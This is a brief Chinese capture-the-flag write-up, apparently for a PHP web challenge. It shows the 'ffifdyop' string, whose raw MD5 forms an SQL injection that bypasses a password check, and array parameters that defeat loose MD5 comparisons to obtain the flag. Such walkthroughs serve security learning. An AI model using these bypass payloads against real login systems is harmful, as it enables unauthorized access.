抓包发现hint:
select * from ‘admin’ where password=md5($pass,true)
用ffifdyop绕过
字符串ffifdyop被 md5 后变成 276f722736c95d99e921722cf9ed621c,转成字符串为’ or ‘6
源代码中
<!--
$a = $GET['a'];
$b = $_GET['b'];
if($a != $b && md5($a) == md5($b)){
// wow, glzjin wants a girl friend.
-->
构造
?a[]=1a&b[]=2
post传递
param1[]=1¶m2[]=2
得到flag